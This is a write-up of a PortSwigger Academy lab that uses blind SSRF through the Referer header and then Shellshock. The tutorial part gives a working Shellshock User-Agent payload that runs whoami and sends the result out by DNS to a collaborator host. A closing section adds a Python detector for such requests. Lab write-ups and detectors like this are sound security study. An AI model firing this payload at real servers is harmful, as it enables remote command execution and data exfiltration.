Solving PortSwigger Academy: Blind SSRF with Shellshock exploitation
In this lab we need to exploit the SSRF with Shellshock.
This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.
To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.
The first step is to find the IP address of the internal host that is reachable through the SSRF, and then exploit the issue. To find the IP we need Burp Intruder.

First we need to confirm that there is a blind SSRF. To test this, let's use Collaborator. I generate a Collaborator hostname and replace the hostname in the Referer header with it. We did not receive anything in the response.

But Collaborator shows some HTTP and DNS hits on the server.

I will use this Shellshock payload in the User-Agent header: '() { :;}; /usr/bin/nslookup $(whoami).ei06wl8lflc263cfv964txaqnhtah05p.oastify.com'

Once Intruder finishes the attack, we can see a hit in Collaborator. When I checked it, I could see the output of the whoami command. I also used the hostname command, which gives me the hostname of the machine/server.


Now to complete the lab we must provide the OS username, which is 'peter-IwD4LP' in my case.

This is how we can solve the lab.
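
Seen from the defender's side, the requests used in this lab leave two recognisable marks in request logs: a Referer pointing at an internal IP literal, and a header value that begins a bash function definition. The check below is an added example, not part of the lab or of any PortSwigger tooling; the function names, the finding labels and the sample requests (including 192.168.0.1 and collab.example) are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Shellshock triggers on a value that starts a bash function definition:
# "()" followed by optional whitespace and "{".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def referer_targets_internal(referer):
    """True if the Referer host is a literal private, loopback or link-local IP."""
    try:
        host = urlsplit(referer).hostname
    except ValueError:
        return False  # malformed URL, e.g. unbalanced IPv6 brackets
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name, not an IP literal; resolving it is out of scope here
    return ip.is_private or ip.is_loopback or ip.is_link_local

def inspect_request(headers):
    """Return a sorted list of findings for one request's headers (a dict)."""
    findings = set()
    for name, value in headers.items():
        if SHELLSHOCK_RE.search(value):
            findings.add(f"shellshock-pattern:{name.lower()}")
        if name.lower() == "referer" and referer_targets_internal(value):
            findings.add("referer-internal-ip")
    return sorted(findings)

# Constructed sample requests (not captured from the lab).
SAMPLES = [
    {"Referer": "https://shop.example/product?productId=1",
     "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"Referer": "http://192.168.0.1:8080/",
     "User-Agent": "() { :;}; /usr/bin/nslookup $(whoami).collab.example"},
    {"Referer": "http://[::1]:8080/", "User-Agent": "curl/8.0"},
]

def scan(samples):
    return [inspect_request(h) for h in samples]

if __name__ == "__main__":
    for i, result in enumerate(scan(SAMPLES)):
        print(i, result or "clean")
```

The same `referer_targets_internal` test can be applied by the analytics fetcher itself before it requests the Referer URL, although a complete SSRF control also has to check the address a hostname resolves to.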